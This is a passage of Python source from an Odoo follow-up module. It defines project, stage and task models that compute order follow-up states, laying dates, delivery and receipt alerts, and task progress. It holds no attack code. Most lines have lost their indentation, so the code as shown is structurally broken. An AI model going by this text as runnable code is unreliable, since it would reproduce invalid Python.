in_progress_of_kanban_step_id)
values['partner_id'] = project.order_id.partner_id.id
order_values_to_upd[project.order_id.id] = values
self._update_tables_from_sale_values(order_values_to_upd)
# recompute follow-up fields
logger.info(' recompute follow-up fields')
order_ids = order_values_to_upd.keys()
orders = self.env['sale.order'].browse(order_ids)
orders._compute_of_activities_state()
# set the migration as done
ir_config_obj.set_param('of.followup.migration', 'True')
# Deactivate view to hide migration button
self.env.ref('of_followup.view_sales_config_settings_followup').active = False
            # Remove the group_of_followup_project_not_migrated group to hide the various follow-up elements
group_not_migrated = self.env.ref('of_followup.group_of_followup_project_not_migrated')
group_user = self.env.ref('base.group_user')
if group_not_migrated in group_user.implied_ids:
group_user.write({'implied_ids': [(3, group_not_migrated.id)]})
logger.info('_followup_data_migration END')
stage_id = fields.Many2one(
compute='_compute_stage_id', comodel_name='of.followup.project.stage', string=u"Etape de suivi", store=True,
group_expand='_read_group_stage_ids')
state = fields.Selection(
[('in_progress', u'En cours'),
('late', u'En retard'),
('ready', u'Prêt'),
('done', u'Terminé'),
('cancel', u'Annulé')],
string=u"Etat du dossier", compute='_compute_state', store=True)
is_done = fields.Boolean(string=u"Est terminé")
is_canceled = fields.Boolean(string=u"Est annulé")
order_id = fields.Many2one(
comodel_name='sale.order', string=u"Commande", required=True, copy=False, ondelete='cascade')
partner_id = fields.Many2one(related='order_id.partner_id', string=u"Client", readonly=True)
intervention_address_id = fields.Many2one(
related='order_id.partner_shipping_id', string=u"Adresse d'intervention", readonly=True)
invoice_status = fields.Selection(related='order_id.invoice_status', string=u"État de facturation", readonly=True)
user_id = fields.Many2one(comodel_name='res.users', string=u"Responsable", default=lambda self: self.env.user)
vendor_id = fields.Many2one(related='order_id.user_id', string=u"Vendeur", readonly=True)
reference_laying_date = fields.Date(
compute='_compute_reference_laying_date', string=u"Date de pose de référence", store=True, compute_sudo=True)
force_laying_date = fields.Boolean(string=u"Forcer la date de pose")
manual_laying_date = fields.Date(string=u"Date de pose (manuelle)")
laying_week = fields.Char(
compute='_compute_reference_laying_date', string=u"Semaine de pose", store=True, compute_sudo=True)
task_ids = fields.One2many(comodel_name='of.followup.task', inverse_name='project_id', string=u"Tâches")
predefined_task_ids = fields.One2many(
comodel_name='of.followup.task', inverse_name='project_id', string=u"Tâches pré-définies",
domain=[('predefined_task', '=', True)])
other_task_ids = fields.One2many(
comodel_name='of.followup.task', inverse_name='project_id', string=u"Autres tâches",
domain=[('predefined_task', '=', False)])
template_id = fields.Many2one(comodel_name='of.followup.project.template', string=u"Modèle")
color = fields.Char(string=u"Couleur", compute="_compute_color")
priority = fields.Selection(
AVAILABLE_PRIORITIES, string=u'Priorité', index=True, default=AVAILABLE_PRIORITIES[0][0])
main_product_brand_id = fields.Many2one(
comodel_name='of.product.brand', compute='_compute_main_product_brand_id',
string=u"Marque de l'article principal", store=True)
info = fields.Text(string=u"Infos")
notes = fields.Text(string=u"Notes")
tag_ids = fields.Many2many(comodel_name='of.followup.project.tag', string=u"Étiquettes")
alert_ids = fields.Many2many(
comodel_name='of.followup.project.alert', string=u"Alertes", compute='_compute_alert_ids')
invoice_count = fields.Integer(string=u"Nombre de factures", related='order_id.invoice_count', readonly=True)
purchase_count = fields.Integer(string=u"Nombre d'achats", related='order_id.purchase_count', readonly=True)
intervention_count = fields.Integer(
string=u"Nombre d'interventions", related='order_id.intervention_count', readonly=True)
to_schedule_count = fields.Integer(
string=u"Nombre de DI à programmer", related='order_id.of_service_count', readonly=True)
delivery_count = fields.Integer(string=u"Nombre de livraisons", related='order_id.delivery_count', readonly=True)
picking_count = fields.Integer(string=u"Nombre de réceptions", compute='_compute_picking_count')
    # Fields used for the kanban card display
late_tasks_number = fields.Char(string=u"Nombre de tâches en retard", compute='_compute_late_tasks_number')
late_tasks = fields.Text(string=u"Tâches en retard", compute='_compute_late_tasks')
info_display = fields.Text(string=u"Infos pour affichage", compute='_compute_info_display')
date_alert_display = fields.Text(string=u"Infos pour alerte de dates", compute='_compute_alert_display')
picking_alert_display = fields.Text(
string=u"Infos pour alerte de livraison/réception", compute='_compute_alert_display')
amount_untaxed = fields.Monetary(string=u"Montant HT", related='order_id.amount_untaxed', readonly=True)
currency_id = fields.Many2one('res.currency', string=u"Devise", related='order_id.currency_id', readonly=True)
_sql_constraints = [('order_uniq', 'unique (order_id)', u"Un suivi a déjà été créé pour cette commande !")]
@api.multi
def name_get(self):
res = []
for followup in self:
name = "Suivi commande %s" % followup.order_id.name
res.append((followup.id, name))
return res
@api.model
def _read_group_stage_ids(self, stages, domain, order):
stage_ids = self.env['of.followup.project.stage'].search([])
return stage_ids
@api.multi
@api.depends('reference_laying_date', 'state')
def _compute_stage_id(self):
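        # Inferred behaviour: done/cancelled follow-ups go to the stage with code 'done'; a laying
        # date already in the past maps to the 's+' stage; otherwise the stage whose week_diff_min /
        # week_diff_max range contains the Monday-to-Monday week difference between today and the
        # reference laying date is used, falling back to the 'new' stage when no laying date is set.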
for rec in self:
if rec.state in ('done', 'cancel'):
rec.stage_id = self.env['of.followup.project.stage'].search([('code', '=', 'done')], limit=1)
else:
laying_date = rec.reference_laying_date
if laying_date:
laying_date = datetime.strptime(laying_date, "%Y-%m-%d").date()
today = date.today()
if laying_date < today:
rec.stage_id = self.env['of.followup.project.stage'].search([('code', '=', 's+')], limit=1)
else:
monday1 = (laying_date - timedelta(days=laying_date.weekday()))
monday2 = (today - timedelta(days=today.weekday()))
week_diff = (monday1 - monday2).days / 7
rec.stage_id = self.env['of.followup.project.stage'].search(
[('week_diff_min', '<=', week_diff), ('week_diff_max', '>=', week_diff)], limit=1)
else:
rec.stage_id = self.env['of.followup.project.stage'].search([('code', '=', 'new')], limit=1)
@api.multi
@api.depends('order_id', 'order_id.state', 'is_done', 'is_canceled', 'task_ids', 'task_ids.is_not_processed',
'task_ids.is_done', 'task_ids.is_late')
def _compute_state(self):
for rec in self:
            # If the order is cancelled, the follow-up is set to cancelled as well
if rec.order_id.state == 'cancel':
rec.state = 'cancel'
else:
                # By default the project is in progress
state = 'in_progress'
if rec.is_done:
                    # The project has been marked as done
state = 'done'
elif rec.is_canceled:
                    # The project has been marked as cancelled
state = 'cancel'
else:
                    # Workaround for a compute-order bug: to know whether tasks are really late,
                    # the follow-up stage must be recomputed first
rec.state = state
rec._compute_stage_id()
                    # All tasks are done (except the unprocessed ones)
if rec.task_ids and not rec.task_ids.filtered(lambda t: not t.is_not_processed and not t.is_done):
state = 'ready'
                    # At least one task is late
elif rec.task_ids.filtered(lambda t: t.is_late):
state = 'late'
rec.state = state
@api.multi
@api.depends('force_laying_date', 'manual_laying_date', 'order_id', 'order_id.intervention_ids',
'order_id.intervention_ids.date', 'order_id.intervention_ids.tache_id',
'order_id.intervention_ids.tache_id.tache_categ_id')
def _compute_reference_laying_date(self):
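        # Inferred behaviour: unless the date is forced manually, the reference laying date is taken
        # from the order's planning interventions whose task category belongs to the "planif" task
        # type: the first upcoming one if any, otherwise the latest past one. The laying week is then
        # derived as the ISO week number of that date.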
for rec in self:
laying_date = False
if rec.force_laying_date:
laying_date = rec.manual_laying_date
elif rec.order_id and rec.order_id.intervention_ids:
planif_task_type = self.env.ref('of_followup.of_followup_task_type_planif')
if planif_task_type:
planif_planning_tache_categs = planif_task_type.planning_tache_categ_ids
interventions = rec.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planif_planning_tache_categs.ids and
i.date > fields.Datetime.now())
if interventions:
laying_date = interventions[0].date_date
else:
interventions = rec.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planif_planning_tache_categs.ids)
if interventions:
laying_date = interventions[-1].date_date
rec.reference_laying_date = laying_date
if laying_date:
laying_week = datetime.strptime(laying_date, "%Y-%m-%d").date().isocalendar()[1]
rec.laying_week = "%02d" % laying_week
else:
rec.laying_week = "Non programmée"
@api.multi
def _compute_color(self):
for rec in self:
state = rec.state
if state == 'in_progress':
color = '#ffffff'
elif state == 'late':
color = '#ffa8a8'
elif state == 'ready':
color = '#bcffa8'
elif state == 'done':
color = '#d7d7d7'
elif state == 'cancel':
color = '#eeeeee'
else:
color = '#ffffff'
rec.color = color
@api.multi
@api.depends('order_id', 'order_id.order_line', 'order_id.order_line.of_article_principal',
'order_id.order_line.product_id', 'order_id.order_line.product_id.brand_id')
def _compute_main_product_brand_id(self):
for rec in self:
main_product_lines = rec.order_id.order_line.filtered(lambda l: l.of_article_principal)
if main_product_lines:
rec.main_product_brand_id = main_product_lines[0].product_id.brand_id
@api.multi
def _compute_alert_ids(self):
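        # Inferred behaviour: raises a "date" alert when the manually forced laying date no longer
        # matches the relevant planning intervention, plus delivery (BL) and receipt (BR) alerts when
        # related pickings are late (not done/cancelled and past their scheduled date).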
for rec in self:
if rec.order_id:
alerts = self.env['of.followup.project.alert']
                # Date check
planif_task_type = self.env.ref('of_followup.of_followup_task_type_planif')
if planif_task_type and rec.force_laying_date:
planif_planning_tache_categs = planif_task_type.planning_tache_categ_ids
interventions = rec.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planif_planning_tache_categs.ids and
i.date > fields.Datetime.now() and i.state != 'cancel')
if interventions:
intervention = interventions[0]
if intervention.date_date != rec.manual_laying_date:
alerts |= self.env.ref('of_followup.of_followup_project_alert_date')
else:
interventions = rec.order_id.intervention_ids.filtered(
lambda i:
i.tache_id.tache_categ_id.id in planif_planning_tache_categs.ids and i.state != 'cancel')
if interventions:
intervention = interventions[-1]
if intervention.date_date != rec.manual_laying_date:
alerts |= self.env.ref('of_followup.of_followup_project_alert_date')
                # Delivery order (BL) check
if rec.order_id.picking_ids:
late_delivery_pickings = rec.order_id.picking_ids.filtered(
lambda p: p.state not in ['done', 'cancel'] and p.min_date < fields.Datetime.now())
if late_delivery_pickings:
alerts |= self.env.ref('of_followup.of_followup_project_alert_bl')
                # Receipt (BR) check
if rec.order_id.purchase_ids.mapped('picking_ids'):
late_receipt_pickings = rec.order_id.purchase_ids.mapped('picking_ids').filtered(
lambda p: p.state not in ['done', 'cancel'] and p.min_date < fields.Datetime.now())
if late_receipt_pickings:
alerts |= self.env.ref('of_followup.of_followup_project_alert_br')
rec.alert_ids = alerts
@api.multi
def _compute_picking_count(self):
for rec in self:
rec.picking_count = sum(rec.order_id.purchase_ids.mapped('picking_count'))
@api.multi
def _compute_late_tasks_number(self):
for rec in self:
rec.late_tasks_number = "(%s/%s)" % (len(rec.task_ids.filtered(lambda t: t.is_late)), len(rec.task_ids))
@api.multi
def _compute_late_tasks(self):
for rec in self:
late_tasks = []
for late_task in rec.task_ids.filtered(lambda t: t.is_late):
if len(late_tasks) < 3:
late_tasks.append(late_task.type_id.short_name)
else:
late_tasks.append("...")
break
rec.late_tasks = json.dumps(late_tasks) if late_tasks else False
@api.multi
def _compute_info_display(self):
for rec in self:
info = []
if rec.info:
for line in rec.info.split('\n'):
info.append(line)
rec.info_display = json.dumps(info) if info else False
@api.multi
def _compute_alert_display(self):
alert_date = self.env.ref('of_followup.of_followup_project_alert_date')
for rec in self:
date_alert = []
picking_alert = []
if rec.alert_ids:
for alert in rec.alert_ids:
if alert == alert_date:
date_alert.append(alert.name)
else:
picking_alert.append(alert.name)
rec.date_alert_display = json.dumps(date_alert) if date_alert else False
rec.picking_alert_display = json.dumps(picking_alert) if picking_alert else False
@api.model
def get_color(self):
state = self.state
if state == 'in_progress':
return 1
elif state == 'late':
return 2
elif state == 'ready':
return 3
elif state == 'done':
return 4
else:
return 0
@api.multi
def set_to_done(self):
self.ensure_one()
self.is_done = True
@api.multi
def set_to_canceled(self):
self.ensure_one()
self.is_canceled = True
@api.multi
def set_to_in_progress(self):
self.ensure_one()
self.is_done = False
@api.multi
def action_send_email(self):
self.ensure_one()
ir_model_data = self.env['ir.model.data']
try:
template_id = ir_model_data.get_object_reference('of_followup', 'of_followup_project_email_template')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference('mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict()
ctx.update({
'default_model': 'of.followup.project',
'default_res_id': self.ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_partner_ids': self.partner_id.ids,
'default_composition_mode': 'comment',
})
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form_id, 'form')],
'view_id': compose_form_id,
'target': 'new',
'context': ctx,
}
@api.onchange('template_id')
def onchange_template_id(self):
if not self.template_id:
return
predefined_new_tasks = []
other_new_tasks = []
for task in self.template_id.task_ids:
vals = {'sequence': task.sequence, 'type_id': task.type_id.id, 'name': task.name}
state = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', task.type_id.id), ('starting_state', '=', True)], limit=1)
if state:
if task.predefined_task:
vals.update({'predefined_state_id': state.id})
predefined_new_tasks += [(0, 0, vals)]
else:
vals.update({'state_id': state.id})
other_new_tasks += [(0, 0, vals)]
return {'value': {'predefined_task_ids': predefined_new_tasks, 'other_task_ids': other_new_tasks}}
@api.onchange('force_laying_date')
def onchange_force_laying_date(self):
self.manual_laying_date = False
@api.multi
def action_view_invoice(self):
self.ensure_one()
return self.order_id.action_view_invoice()
@api.multi
def action_view_purchase(self):
self.ensure_one()
return self.order_id.action_view_achats()
@api.multi
def action_view_interventions(self):
self.ensure_one()
return self.order_id.action_view_intervention()
@api.multi
def action_view_to_schedule(self):
self.ensure_one()
return self.order_id.action_view_a_programmer()
@api.multi
def action_view_delivery(self):
self.ensure_one()
return self.order_id.action_view_delivery()
@api.multi
def action_view_picking(self):
self.ensure_one()
action = self.env.ref('stock.action_picking_tree')
result = action.read()[0]
result.pop('id', None)
result['context'] = {}
pick_ids = self.order_id.purchase_ids.mapped('picking_ids').ids or []
if len(pick_ids) > 1:
result['domain'] = "[('id', 'in', [" + ','.join(map(str, pick_ids)) + "])]"
elif len(pick_ids) == 1:
res = self.env.ref('stock.view_picking_form', False)
result['views'] = [(res and res.id or False, 'form')]
result['res_id'] = pick_ids and pick_ids[0] or False
return result
@api.model
def create(self, vals):
res = super(OFFollowupProject, self).create(vals)
res.order_id.write({'of_followup_project_id': res.id})
return res
@api.model
def cron_move_project(self):
for project in self.search([]):
project._compute_stage_id()
@api.model
def cron_recompute_reference_laying_date(self):
for project in self.search([]):
project._compute_reference_laying_date()
@api.multi
def last_step_for_all(self):
for followup in self:
for task in followup.other_task_ids:
states = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', task.type_id.id), ('sequence', '>', task.state_id.sequence)])
if states:
task.state_id = states[-1].id
class OFFollowupProjectStage(models.Model):
_name = 'of.followup.project.stage'
_description = "Etat de suivi des projets"
_order = 'sequence'
name = fields.Char(string=u"Nom")
code = fields.Char(string=u"Code")
sequence = fields.Integer(string=u"Séquence")
fold = fields.Boolean(string=u"Replié par défaut")
week_diff_min = fields.Integer(string=u"Différence de semaine minimale")
week_diff_max = fields.Integer(string=u"Différence de semaine maximale")
class OFFollowupTask(models.Model):
_name = 'of.followup.task'
_description = u"Tâche liée au suivi des projets"
_order = 'sequence'
project_id = fields.Many2one(
comodel_name="of.followup.project", string=u"Projet", required=True, ondelete='cascade')
sequence = fields.Integer(string=u"Séquence")
type_id = fields.Many2one(comodel_name='of.followup.task.type', string=u"Type", required=True)
name = fields.Char(string=u"Nom", required=True)
state_id = fields.Many2one(comodel_name='of.followup.task.type.state', string=u"Etat")
predefined_state_id = fields.Many2one(
comodel_name='of.followup.task.type.state', string=u"Etat", compute='_compute_predefined_state_id')
global_state = fields.Char(string=u"État", compute='_compute_global_state')
predefined_task = fields.Boolean(string=u"Tâche pré-définie", related='type_id.predefined_task')
force_state = fields.Boolean(string=u"Gestion manuelle de l'état")
is_late = fields.Boolean(string=u"Tâche en retard", compute='_compute_is_late')
is_done = fields.Boolean(string=u"Tâche terminée", compute='_compute_is_done')
is_not_processed = fields.Boolean(string=u"Tâche non traitée", compute='_compute_is_not_processed')
planif_intervention_ids = fields.One2many(
comodel_name='of.planning.intervention', string=u"RDVs d'intervention planifiés",
compute='_compute_planif_intervention_ids')
display_planif_interventions = fields.Boolean(
string=u"Afficher les RDVs d'intervention planifiés ?", compute='_compute_planif_intervention_ids')
vt_intervention_ids = fields.One2many(
comodel_name='of.planning.intervention', string=u"RDVs visite technique",
compute='_compute_vt_intervention_ids')
display_vt_interventions = fields.Boolean(
string=u"Afficher les RDVs visite technique ?", compute='_compute_vt_intervention_ids')
app_order_line_ids = fields.One2many(
comodel_name='sale.order.line', string=u"Lignes de commande appareils", compute='_compute_app_order_line_ids')
display_app_order_lines = fields.Boolean(
string=u"Afficher les lignes de commande appareils ?", compute='_compute_app_order_line_ids')
acc_order_line_ids = fields.One2many(
comodel_name='sale.order.line', string=u"Lignes de commande accessoires", compute='_compute_acc_order_line_ids')
display_acc_order_lines = fields.Boolean(
string=u"Afficher les lignes de commande accessoires ?", compute='_compute_acc_order_line_ids')
app_picking_line_ids = fields.One2many(
comodel_name='stock.move', string=u"Lignes de BL appareils", compute='_compute_app_picking_line_ids')
display_app_picking_lines = fields.Boolean(
string=u"Afficher les lignes de BL appareils ?", compute='_compute_app_picking_line_ids')
acc_picking_line_ids = fields.One2many(
comodel_name='stock.move', string=u"Lignes de BL accessoires", compute='_compute_acc_picking_line_ids')
display_acc_picking_lines = fields.Boolean(
string=u"Afficher les lignes de BL accessoires ?", compute='_compute_acc_picking_line_ids')
@api.multi
def _compute_predefined_state_id(self):
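        # This compute derives the state of each predefined task from related records, depending on
        # the task type (inferred from the branches below): scheduling and technical-visit tasks look
        # at planning interventions, while appliance/accessory tasks look at sale order lines or
        # picking lines and at the state of the linked purchase orders and receipts.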
for rec in self:
if not rec.type_id.state_ids or not rec.type_id.state_ids.filtered(lambda s: s.starting_state):
continue
rec.predefined_state_id = rec.type_id.state_ids.filtered(lambda s: s.starting_state)[0]
            # Scheduling
if rec.type_id == self.env.ref('of_followup.of_followup_task_type_planif'):
interventions = rec.planif_intervention_ids
                # There are intervention appointments and they are all in the 'Done' status
if interventions and not interventions.filtered(lambda i: i.state not in ['done', 'cancel']):
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_planif_03')
                # At least one intervention appointment is in the 'Confirmed' status
elif interventions.filtered(lambda i: i.state == 'confirm'):
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_planif_02')
            # Technical visit
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_vt'):
interventions = rec.vt_intervention_ids
                # There is a "VT" task intervention appointment in the 'Done' status
if interventions.filtered(lambda i: i.state == 'done'):
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_vt_03')
                # There is a "VT" task intervention appointment in the 'Confirmed' status
elif interventions.filtered(lambda i: i.state == 'confirm'):
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_vt_02')
            # Appliances
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_app'):
app_order_lines = rec.app_order_line_ids
po_validated = bool(app_order_lines)
receipt_validated = bool(app_order_lines)
                # Non-kit lines
for app_order_line in app_order_lines.filtered(lambda l: not l.of_is_kit):
stock_moves = app_order_line.procurement_ids.mapped('move_ids')
                    # First check whether the products are already in stock/reserved
qty = sum(self.env['stock.quant'].search([('reservation_id', 'in', stock_moves.ids)]).mapped('qty'))
if qty < app_order_line.product_uom_qty:
                        # Fetch the associated validated purchase order line(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', 'in', stock_moves.ids)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
                        # Check that the ordered quantities match
if app_order_line.product_uom_qty - qty <= sum(validated_purchase_lines.mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
                # Kit lines
for app_order_line in app_order_lines.filtered(lambda l: l.of_is_kit):
for kit_line in app_order_line.kit_id.kit_line_ids.filtered(
lambda l: l.product_id.type == 'product'):
stock_moves = kit_line.procurement_ids.mapped('move_ids')
                        # First check whether the products are already in stock/reserved
qty = sum(
self.env['stock.quant'].search([('reservation_id', 'in', stock_moves.ids)]).mapped('qty'))
if qty < kit_line.qty_per_kit:
                            # Fetch the associated validated purchase order line(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', 'in', stock_moves.ids)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
                            # Check that the ordered quantities match
if kit_line.qty_per_kit - qty <= sum(validated_purchase_lines.mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
if not app_order_lines:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_np')
else:
if po_validated:
if receipt_validated:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_app_03')
else:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_app_02')
            # Accessories
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_acc'):
acc_order_lines = rec.acc_order_line_ids
po_validated = bool(acc_order_lines)
receipt_validated = bool(acc_order_lines)
                # Non-kit lines
for acc_order_line in acc_order_lines.filtered(lambda l: not l.of_is_kit):
stock_moves = acc_order_line.procurement_ids.mapped('move_ids')
                    # First check whether the products are already in stock/reserved
qty = sum(self.env['stock.quant'].search([('reservation_id', 'in', stock_moves.ids)]).mapped('qty'))
if qty < acc_order_line.product_uom_qty:
                        # Fetch the associated validated purchase order line(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', 'in', stock_moves.ids)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
                        # Check that the ordered quantities match
if acc_order_line.product_uom_qty - qty <= sum(validated_purchase_lines.mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
                # Kit lines
for acc_order_line in acc_order_lines.filtered(lambda l: l.of_is_kit):
for kit_line in acc_order_line.kit_id.kit_line_ids.filtered(
lambda l: l.product_id.type == 'product'):
stock_moves = kit_line.procurement_ids.mapped('move_ids')
                        # First check whether the products are already in stock/reserved
qty = sum(
self.env['stock.quant'].search([('reservation_id', 'in', stock_moves.ids)]).mapped('qty'))
if qty < kit_line.qty_per_kit:
                            # Fetch the associated validated purchase order line(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', 'in', stock_moves.ids)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
                            # Check that the ordered quantities match
if kit_line.qty_per_kit - qty <= sum(validated_purchase_lines.mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
if not acc_order_lines:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_np')
else:
if po_validated:
if receipt_validated:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_app_03')
else:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_app_02')
            # Appliances outside the sale order
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_out_app'):
app_picking_lines = rec.app_picking_line_ids
po_validated = bool(app_picking_lines)
receipt_validated = bool(app_picking_lines)
for app_picking_line in app_picking_lines:
                    # First check whether the products are already in stock/reserved
qty = sum(self.env['stock.quant'].search([('reservation_id', '=', app_picking_line.id)]).
mapped('qty'))
if qty < app_picking_line.product_uom_qty:
                        # Fetch the associated validated purchase order line(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', '=', app_picking_line.id)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
                        # Check that the ordered quantities match
if app_picking_line.product_uom_qty - qty <= sum(validated_purchase_lines.
mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
if not app_picking_lines:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_np')
else:
if po_validated:
if receipt_validated:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_out_app_03')
else:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_out_app_02')
            # Accessories outside the sale order
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_out_acc'):
acc_picking_lines = rec.acc_picking_line_ids
po_validated = bool(acc_picking_lines)
receipt_validated = bool(acc_picking_lines)
for acc_picking_line in acc_picking_lines:
                    # First check whether the products are already in stock/reserved
qty = sum(self.env['stock.quant'].search([('reservation_id', '=', acc_picking_line.id)]).
mapped('qty'))
if qty < acc_picking_line.product_uom_qty:
                        # Fetch the associated validated purchase order line(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', '=', acc_picking_line.id)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
                        # Check that the ordered quantities match
if acc_picking_line.product_uom_qty - qty <= sum(validated_purchase_lines.
mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
if not acc_picking_lines:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_np')
else:
if po_validated:
if receipt_validated:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_out_acc_03')
else:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_out_acc_02')
@api.multi
@api.depends('state_id', 'predefined_state_id', 'predefined_task', 'force_state')
def _compute_global_state(self):
for rec in self:
if rec.predefined_task and not rec.force_state:
rec.global_state = rec.predefined_state_id.name
else:
rec.global_state = rec.state_id and rec.state_id.name or ""
@api.multi
def _compute_is_late(self):
not_processed_state = self.env.ref('of_followup.of_followup_task_type_state_np')
for rec in self:
if rec.predefined_task and not rec.force_state and rec.predefined_state_id == not_processed_state:
rec.is_late = False
else:
if rec.predefined_task and not rec.force_state:
late_stage = rec.predefined_state_id.stage_id
else:
late_stage = rec.state_id.stage_id
if late_stage and late_stage.sequence <= rec.project_id.stage_id.sequence:
rec.is_late = True
else:
rec.is_late = False
@api.multi
def _compute_is_done(self):
not_processed_state = self.env.ref('of_followup.of_followup_task_type_state_np')
for rec in self:
if rec.predefined_task and not rec.force_state and rec.predefined_state_id == not_processed_state:
rec.is_done = False
else:
if rec.predefined_task and not rec.force_state:
final_state = rec.predefined_state_id.final_state
else:
final_state = rec.state_id.final_state
if final_state:
rec.is_done = True
else:
rec.is_done = False
@api.multi
def _compute_is_not_processed(self):
not_processed_state = self.env.ref('of_followup.of_followup_task_type_state_np')
for rec in self:
if rec.predefined_task and not rec.force_state and rec.predefined_state_id == not_processed_state:
rec.is_not_processed = True
else:
rec.is_not_processed = False
@api.multi
def _compute_planif_intervention_ids(self):
planif_task_type = self.env.ref('of_followup.of_followup_task_type_planif')
planning_tache_categs = planif_task_type.planning_tache_categ_ids
for rec in self:
if rec.type_id == planif_task_type:
rec.planif_intervention_ids = rec.project_id.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planning_tache_categs.ids)
rec.display_planif_interventions = True
else:
rec.planif_intervention_ids = False
rec.display_planif_interventions = False
@api.multi
def _compute_vt_intervention_ids(self):
vt_task_type = self.env.ref('of_followup.of_followup_task_type_vt')
planning_tache_categs = vt_task_type.planning_tache_categ_ids
for rec in self:
if rec.type_id == vt_task_type:
rec.vt_intervention_ids = rec.project_id.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planning_tache_categs.ids)
rec.display_vt_interventions = True
else:
rec.vt_intervention_ids = False
rec.display_vt_interventions = False
@api.multi
def _compute_app_order_line_ids(self):
app_task_type = self.env.ref('of_followup.of_followup_task_type_app')
product_categs = app_task_type.product_categ_ids
for rec in self:
if rec.type_id == app_task_type:
rec.display_app_order_lines = True
if rec.project_id.order_id.state == 'sale':
rec.app_order_line_ids = rec.project_id.order_id.order_line.filtered(
lambda l: l.product_id.categ_id.id in product_categs.ids and
(l.product_id.type == 'product' or l.of_is_kit) and l.product_uom_qty > 0)
else:
rec.app_order_line_ids = False
else:
rec.app_order_line_ids = False
rec.display_app_order_lines = False
@api.multi
def _compute_acc_order_line_ids(self):
acc_task_type = self.env.ref('of_followup.of_followup_task_type_acc')
app_task_type = self.env.ref('of_followup.of_followup_task_type_app')
product_categs = app_task_type.product_categ_ids
for rec in self:
if rec.type_id == acc_task_type:
rec.display_acc_order_lines = True
if rec.project_id.order_id.state == 'sale':
rec.acc_order_line_ids = rec.project_id.order_id.order_line.filtered(
lambda l: l.product_id.categ_id.id not in product_categs.ids and
(l.product_id.type == 'product' or l.of_is_kit) and l.product_uom_qty > 0)
else:
rec.acc_order_line_ids = False
else:
rec.acc_order_line_ids = False
rec.display_acc_order_lines = False
@api.multi
def _compute_app_picking_line_ids(self):
out_app_task_type = self.env.ref('of_followup.of_followup_task_type_out_app')
product_categs = out_app_task_type.product_categ_ids
for rec in self:
if rec.type_id == out_app_task_type:
rec.app_picking_line_ids = rec.project_id.order_id.picking_ids.mapped('move_lines').\
filtered(lambda l: not l.procurement_id and
